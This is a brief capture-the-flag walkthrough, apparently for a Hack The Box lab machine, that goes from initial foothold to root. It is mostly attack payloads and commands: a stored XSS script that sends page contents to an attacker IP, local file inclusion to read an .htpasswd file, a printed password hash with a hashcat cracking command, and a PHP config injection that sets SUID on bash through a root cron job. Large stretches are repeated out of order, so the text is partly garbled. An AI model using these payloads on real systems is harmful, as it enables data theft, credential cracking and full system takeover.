Foothold
1. Upload an MD file that contains an XSS payload
<script>
fetch("http://alert.htb/messages.php").then(response => response.text()).then(response => {fetch("http://10.10.14.6/?"+btoa(response))})
</script>
2. send a message that contains a link to the hosted payload
email=test%40test.com&message=<script src="http://alert.htb/visualizer.php?link_share=675155dfa06ca8.28692334.md
3. get messages.php and see that it makes a request that is vulnerable to LFI
<h1>Messages</h1><ul><li><a href='messages.php?file=2024-03-10_15-48-34.txt'>2024-03-10_15-48-34.txt</a></li></ul>
4. LFI to get /etc/apache2/sites-enabled/000-default.conf
5. then LFI to get /var/www/statistics.alert.htb/.htpasswd and get albert hash
albert:$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/
6. crack the hash (1600 | Apache $apr1$ MD5, md5apr1, MD5 (APR))
hashcat -m 1600 hash /usr/share/wordlists/rockyou.txt
7. SSH as Albert
<script>
fetch("http://alert.htb/messages.php").then(response => response.text()).then(response => {fetch("http://10.10.14.6/?"+btoa(response))})
</script>
2. send a message that contains a link to the hosted payload
email=test%40test.com&message=<script src="http://alert.htb/visualizer.php?link_share=675155dfa06ca8.28692334.md
3. get messages.php and see that it makes a request that is vulnerable to LFI
<h1>Messages</h1><ul><li><a href='messages.php?file=2024-03-10_15-48-34.txt'>2024-03-10_15-48-34.txt</a></li></ul>
4. LFI to get /etc/apache2/sites-enabled/000-default.conf
5. then LFI to get /var/www/statistics.alert.htb/.htpasswd and get albert hash
albert:$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/
6. crack the hash (1600 | Apache $apr1$ MD5, md5apr1, MD5 (APR))
hashcat -m 1600 hash /usr/share/wordlists/rockyou.txt
7. SSH as Albert
PrivEsc
1. run pspy64 to see cronjob
/bin/sh -c /usr/bin/php -f /opt/website-monitor/monitor.php >/dev/null 2>&1
/usr/bin/php -f /opt/website-monitor/monitor.php
2. /opt/website-monitor/monitor.php imports config/configuration.php
3. we can edit config/configuration.php
system(’chmod +s /bin/bash’)
4. get root
/bin/sh -c /usr/bin/php -f /opt/website-monitor/monitor.php >/dev/null 2>&1
/usr/bin/php -f /opt/website-monitor/monitor.php
2. /opt/website-monitor/monitor.php imports config/configuration.php
3. we can edit config/configuration.php
system(’chmod +s /bin/bash’)
4. get root